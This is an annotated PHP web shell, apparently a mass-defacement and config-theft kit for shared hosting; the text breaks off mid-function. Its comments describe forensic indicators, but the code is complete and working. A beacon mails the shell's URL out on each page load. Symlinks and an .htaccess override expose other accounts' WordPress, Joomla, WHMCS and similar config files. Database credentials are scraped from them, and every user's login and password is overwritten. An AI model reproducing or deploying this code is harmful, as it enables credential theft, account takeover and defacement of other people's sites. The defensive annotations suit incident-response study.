<STYLE>
/* Operator-panel theme (black background, lime/red text, Tahoma/Verdana) typical of defacement web shells.
   Nothing here is functional; it is only useful as a visual fingerprint when triaging a suspicious page. */
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid 
#000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 
1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: 
#FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>
<?php
// ---- Malware analysis note ----
// This paste is a PHP mass-defacement / config-theft kit for shared hosting, not a legitimate script.
// Nothing in the file authenticates the operator: every action below is reachable by anyone who can
// request the URL, so a host carrying this file is exposed to every visitor, not only to its author.
set_time_limit(0);      // run unbounded: the loops below walk every account on the host
error_reporting(0);     // hide the warnings that the blind symlink/mysql attempts would otherwise emit

$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

// Call-home beacon: on EVERY page load, e-mails the shell's own URL (subject = server IP) to a hard-coded
// mailbox (the address is obfuscated in this paste copy). Detection: outbound mail from the web-server
// user whose subject is the host's IP address and whose body is a URL on this host.
mail('[email protected]',$_SERVER['SERVER_ADDR'],$url);

$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);   // assigned but never referenced in this paste
##.htaccess
// Staging directory for the symlink attack. Filesystem artifacts to look for during IR:
//   ./pee/            created mode 0777
//   ./pee/root -> /   web-reachable symlink to the filesystem root
//   ./temp.txt        created empty here (the handle is discarded, never written through or closed)
//   ./pee/.htaccess   contents below
@mkdir('pee',0777);
@symlink("/","pee/root");
@fopen('temp.txt','w');
// The .htaccess turns ./pee into a plain-text browser for whatever the symlinks point at (Apache semantics):
//  - "Options all" re-enables FollowSymLinks and directory indexes even where the vhost disabled them;
//  - the AddType/AddHandler lines re-map .php and .html away from the PHP engine so symlinked CMS config
//    files are served as text instead of being executed;
//  - "Require None" / "Satisfy Any" neutralise any inherited access restriction.
// This only succeeds where AllowOverride permits Options/FileInfo and symlinks are followed regardless of
// owner; SymLinksIfOwnerMatch (or a jailed/per-user PHP) defeats the cross-account links created further down.
$htaccss = "Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
 
file_put_contents("pee/.htaccess",$htaccss);
// Phase 1a (cPanel-style hosts): enumerate every hosted domain from the BIND zone directory and map it to
// the owning account via the file owner of /etc/valiases/<domain>. For each account, create symlinks in
// ./pee pointing at the usual config-file locations of popular CMSes inside that account's docroot.
// $dir[3] is the 4th component of this script's own cwd (e.g. "public_html" for /home/<user>/public_html),
// i.e. the kit assumes every other account uses the same docroot name as the compromised one.
// symlink() creates the link whether or not the target exists and fails once a link of that name already
// exists, so for each CMS only the first candidate path ever becomes the link.
// Resulting artifacts: ./pee/<account>-<CMS>.txt symlinks for every account on the server.
if(is_readable("/var/named")){
$list = scandir("/var/named");
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
foreach($list as $domain){
if(strpos($domain,".db"))
{
	$domain = str_replace('.db','',$domain);
	$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
	
error_reporting(0);

$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);

symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/config.php',"pee/".$owner['name'].'-PhpBB.txt');
symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"pee/".$owner['name'].'-vBulletin.txt');
symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"pee/".$owner['name'].'-IPB.txt');
symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"pee/".$owner['name'].'-MyBB.txt');
symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"pee/".$owner['name'].'-SMF.txt');
symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"pee/".$owner['name'].'-Drupal.txt');
symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"pee/".$owner['name'].'-e107.txt');
symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"pee/".$owner['name'].'-Seditio.txt');
symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"pee/".$owner['name'].'-osCommerce.txt');
symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

// Bookkeeping: probe the WordPress link over HTTP and append a table row to ./temp.txt on a 200.
// $pageURL is only assigned further down this file, so at this point the probe URL has no host part.
$link = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';

if(chk_header($link))
	{
		$str = '<tr><td>'.$domain.'</td><td>'.$owner['name'].'</td><td>/WordPress</td>'.Chr(10);
		file_put_contents("temp.txt",$str,FILE_APPEND);
	}




}
}
}
// Phase 1b (any Linux host): take every username from /etc/passwd and repeat the symlink creation assuming
// the home layout /<$dir[1]>/<user>/<$dir[3]>/... (e.g. /home/<user>/public_html/...).
// /etc/passwd is world-readable on nearly every system, so this phase runs even without cPanel.
$etc = file_get_contents("/etc/passwd");
$etcz = explode("\n",$etc);

foreach($etcz as $etz){
$etcc = explode(":",$etz);
error_reporting(0);

$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);

symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
// NOTE(review): $link is not recomputed for this user; whatever the previous loop left in it is probed again,
// so the ./temp.txt rows written here do not correspond to $etcc[0].
if(chk_header($link))
	{
		$str = '<tr><td></td><td>'.$etcc[0].'</td><td>/WordPress</td>'.Chr(10);
		file_put_contents("temp.txt",$str,FILE_APPEND);
	}
}
// Success oracle used throughout the kit: issues a real GET for $link (from the server to itself) and
// returns true when the first status line contains "200", i.e. when Apache is serving the symlinked
// config file as plain text. These probes show up in the access log as GETs for /pee/<account>-<CMS>.txt
// originating from the server's own IP, which is a cheap detection signal.
function chk_header($link){
$pee = get_headers($link,1);
if(strpos($pee[0],"200")){
return true;
}else{ return false; }
}
// Crude substring extractor: returns the text between the first occurrence of $start and the next $end
// after it. Used below to scrape DB host/user/password/name/prefix out of stolen wp-config.php and
// configuration.php files, and nonces/file names out of WordPress admin pages.
// If $start is absent, strpos() yields false (arithmetically 0) and the slice starts at offset strlen($start).
function Find($str,$start,$end){
$len = strlen($str);
$start_pos = (strpos($str,$start) + strlen($start));
$str = substr($str,$start_pos);
$end_pos = strpos($str,$end);
$str = substr($str,0,$end_pos);
return $str;    
}
// Base URL (always http://) of the directory this script lives in; all /pee/... probe URLs are built on it.
// Derived by dropping the last path segment (the script name) from the current request URI.
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );
#######
// Probe "<link>-<cms>.txt" over HTTP and, on a 200, record "<domain> | <owner> | <cms>" as an HTML table
// row (with a link to the exposed config) in ./pee.tmp and echo it to the operator.
// Artifact: ./pee.tmp is the kit's persistent list of accounts whose config file was successfully exposed.
// Values are written into HTML unescaped.
function cms_add($link,$domain,$owner,$cms)
{
	
	$link = $link.'-'.$cms.'.txt';
	if(chk_header($link))
	{
		$url = 'http://'.$domain;
		$str = '<tr><td> <a href='.$url.'>'.$domain.'</a></td><td>'.$owner.'</td><td><a 
href='.$link.'>'.$cms.'</td>'.Chr(10);
		file_put_contents("pee.tmp",$str,FILE_APPEND);
		echo $str;
		
	}
}
// cURL wrapper used by the 'wp_def' action for the WordPress login and theme-editor requests.
// Follows redirects, persists cookies in ./COOKIE.txt in the script's directory (IR artifact), copies the
// OPERATOR's browser User-Agent onto the outgoing requests, and switches to POST when $post is non-null.
// Consequence for victim-site logs: the login/theme-editor requests arrive from this server's IP carrying
// the operator's browser UA string. cURL errors are echoed into the operator page.
function CurlPage($url,$post = null,$head = true) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $head); 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt"); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");

If ($post != NULL){
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
$urlPage = curl_exec($ch);

if(curl_errno($ch)){
echo curl_error($ch);
}

curl_close($ch);
return($urlPage);
}
// Append $str to $file unless the file already contains it (strpos() truthiness: a match at offset 0 is
// treated as "absent", so a line that happens to be first is re-appended).
// Used to accumulate ./wp.txt, the kit's list of defaced page URLs (IR artifact).
function listall($file,$str){
if(file_exists($file)){
$do = file_get_contents($file);
if(!strpos($do,$str)){
file_put_contents($file,$str,FILE_APPEND);
}
}else{
file_put_contents($file,$str,FILE_APPEND);
}
}
// Operator UI: a remotely hosted banner image (Facebook CDN URL, a useful network indicator when the page
// is opened) followed by the action menu. Actions are selected with ?do=<name> and handled by the switch below.
echo "<center>

<img src='http://sphotos-f.ak.fbcdn.net/hphotos-ak-prn1/65176_115131175320548_863165804_n.jpg'><br>
[ <a href='?do=cms_detect'>./CmsDetector~</a> ] -- [ <a href='?do=pass_change'>./MassPASSChange~</a> ] -- [ <a 
href='?do=wp_def'>./Wp Mass Defacer</a> ] -- [ <a href='?do=uploader'>./Uploader</a> ] -- [ <a href='?do=wp_up'>c00ming 
s00n</a> ]<br><br><br></center> ";
// Action dispatcher. $_REQUEST is accepted, so every action can be triggered by GET as well as POST,
// and no credential or token is checked anywhere.
if(isset($_REQUEST['do'])){ 
switch ($_REQUEST['do']){

################CMS DETECTOR
// ---- ?do=cms_detect ----
// First run: create ./pee.tmp, walk /var/named again and probe each account's symlinks for 12 CMS types.
// Later runs: the presence of ./pee.tmp short-circuits the scan; the file is fetched back over HTTP and
// echoed as the cached result table.
case 'cms_detect':

if(!file_exists('pee.tmp')){
@fopen('pee.tmp', 'w');

echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';

$p = 0;

if(is_readable("/var/named")){
$list = scandir("/var/named");
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
foreach($list as $domain){
if(strpos($domain,".db"))
{
	$domain = str_replace('.db','',$domain);
	$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
	
error_reporting(0);

$link = $pageURL.'pee/'.$owner['name'];

cms_add($link,$domain,$owner['name'],"WordPress");
cms_add($link,$domain,$owner['name'],"Joomla");
cms_add($link,$domain,$owner['name'],"vBulletin");
cms_add($link,$domain,$owner['name'],"WHMCS");
cms_add($link,$domain,$owner['name'],"PhpBB");
cms_add($link,$domain,$owner['name'],"MyBB");
cms_add($link,$domain,$owner['name'],"IPB");
cms_add($link,$domain,$owner['name'],"SMF");
cms_add($link,$domain,$owner['name'],"Drupal");
cms_add($link,$domain,$owner['name'],"e107");
cms_add($link,$domain,$owner['name'],"Seditio");
cms_add($link,$domain,$owner['name'],"osCommerce");

}
}
}
}else{
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';
// The cached table is fetched over HTTP rather than read from disk (another self-request in the access log).
$content = file_get_contents($pageURL.'pee.tmp');
echo $content;
}
break;
################MASS DEFACE
// ---- ?do=pass_change : "MassPASSChange" ----
// For every account whose wp-config.php / configuration.php is exposed through ./pee, this action:
//   1. fetches the config over HTTP and scrapes the DB credentials out of it with Find();
//   2. connects to the database with the legacy ext/mysql API (mysql_connect) using the victim's credentials;
//   3. runs "UPDATE <prefix>users SET user_login|username = ..." and "... SET user_pass|password = ..."
//      WITH NO WHERE CLAUSE, so EVERY row of the users table is overwritten: all legitimate users of the
//      site are locked out and every account becomes the operator's.
// IR consequences: every DB credential in an exposed config must be treated as compromised (rotate it),
// and the users table of each affected site must be restored from a pre-compromise backup.
// The form is pre-filled with the operator's default username/password.
case 'pass_change':

echo <<<PEE
<form method='POST'>
<center>
USER : <input size='20' value='doomtimy' name='user' type='text'><br>
PASS : <input size='20' value='ahscrew' name='pass' type='text'>
<br>
<input value='Change' name='' type='submit'><br><br>
</form>

PEE;

if($_POST){
################### USER & PASS ################
$user = $_POST['user'];
$pass = $_POST['pass'];
################################################


// Branch A: cPanel hosts (domain list from /var/named, owner from /etc/valiases).
if(is_readable("/var/named"))
{
	
	echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
	echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
	$list = scandir("/var/named");
	foreach($list as $domain){
	if(strpos($domain,".db"))
	{
		$domain = str_replace('.db','',$domain);
		$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
		$url = 'http://'.$domain;
		// WordPress: the exposed wp-config.php is fetched twice (first result discarded).
		if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
		{ 
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
			
			file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			$hostname = Find($cnf,"define('DB_HOST', '","');");
			$username = Find($cnf,"define('DB_USER', '","');");
			$password = Find($cnf,"define('DB_PASSWORD', '","');");
			$dbname = Find($cnf,"define('DB_NAME', '","');");
			$prefix = Find($cnf,"table_prefix  = '","'");
			
			$link=mysql_connect($hostname,$username,$password);
			
			if ($link) 
			{
				$hash = crypt($pass);   // crypt() hash of the submitted password, written to every user row
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				// Unqualified UPDATEs: every row in <prefix>users is rewritten.
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
				$req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
				$data = mysql_fetch_array($req);
				$site_url=$data["option_value"];
				
				error_reporting(0);
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font 
color="green">success..</font></td>';
				
			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql 
fail</font></td>';
			}
		
			
		
		
		}
		
		
		
		// Joomla: two config dialects are recognised, JConfig (1.6+) and mosConfig_* (1.0/1.5).
		// Both branches connect to "localhost" rather than the host named in the config.
		elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt'))
		{ 
		
		##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt');
			$config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
			
			if(preg_match('%(JConfig|mosConfig)%',$cnf)){
			
			######
			if(preg_match('%JConfig%', $cnf)){
			$username=Find($cnf,"\$user = '","'");
			$password=Find($cnf,"\$password = '","'");
			$dbname=Find($cnf,"\$db = '","'");
			$prefix=Find($cnf,"\$dbprefix = '","'");
			
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($user);   // note: this branch hashes $user, not $pass
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
				
			echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 
color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 
fail</font></td>';
			}
			
			}
			
			#####
			elseif(preg_match('%mosConfig%',$cnf)){
			$username=Find($cnf,"\$mosConfig_user = '","'");
			$password=Find($cnf,"\$mosConfig_password = '","'");
			$dbname=Find($cnf,"\$mosConfig_db = '","'");
			$prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
			$pwd = md5($npass);   // $npass is never assigned and $pwd is never used
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
				
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 
color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 
fail</font></td>';
			}
			
			}
			
			
			}
			#########
			
			
		}
	}
}
}

// Branch B: non-cPanel hosts, driven by the /etc/passwd usernames collected in phase 1b ($etcz).
// NOTE(review): $owner and $domain are not set in this branch; the rows echoed below reuse whatever
// values earlier code left in them, so the DOMAIN/USER columns do not describe $etcc[0].
elseif(is_readable("/etc/passwd")){

echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
			
foreach($etcz as $etz){
$etcc = explode(":",$etz);


if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt'))
		{ 
			
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
			file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
			##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
			$hostname = Find($cnf,"define('DB_HOST', '","');");
			$username = Find($cnf,"define('DB_USER', '","');");
			$password = Find($cnf,"define('DB_PASSWORD', '","');");
			$dbname = Find($cnf,"define('DB_NAME', '","');");
			$prefix = Find($cnf,"table_prefix  = '","'");
			
			$link=mysql_connect($hostname,$username,$password);
			
			if ($link) 
			{
				
				$hash = crypt($user);   // note: this branch hashes $user, not $pass
				mysql_select_db($dbname,$link) ;
				$req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
				$data = mysql_fetch_array($req);
				$site_url=$data["option_value"];
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
				
				error_reporting(0);
				
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font 
color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql 
fail</font></td>';
			}
		
			
		
		
		}
		
		
		
		elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt'))
		{ 
		
		##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt');
			$config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
			
			if(preg_match('%(JConfig|mosConfig)%',$cnf)){
			
			######
			if(preg_match('%JConfig%', $cnf)){
			$username=Find($cnf,"\$user = '","'");
			$password=Find($cnf,"\$password = '","'");
			$dbname=Find($cnf,"\$db = '","'");
			$prefix=Find($cnf,"\$dbprefix = '","'");
			$site_url = Find($cnf,"\$mailfrom = '","'");   // site domain guessed from the config's mail-from address
			$site_url = explode("@",$site_url);
			
			
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
			echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 
color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 
fail</font></td>';
			}
			
			}
			
			#####
			elseif(preg_match('%mosConfig%',$cnf)){
			$username=Find($cnf,"\$mosConfig_user = '","'");
			$password=Find($cnf,"\$mosConfig_password = '","'");
			$dbname=Find($cnf,"\$mosConfig_db = '","'");
			$prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
			$site_url = Find($cnf,"\$mailfrom = '","'");
			$site_url = explode("@",$site_url);
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
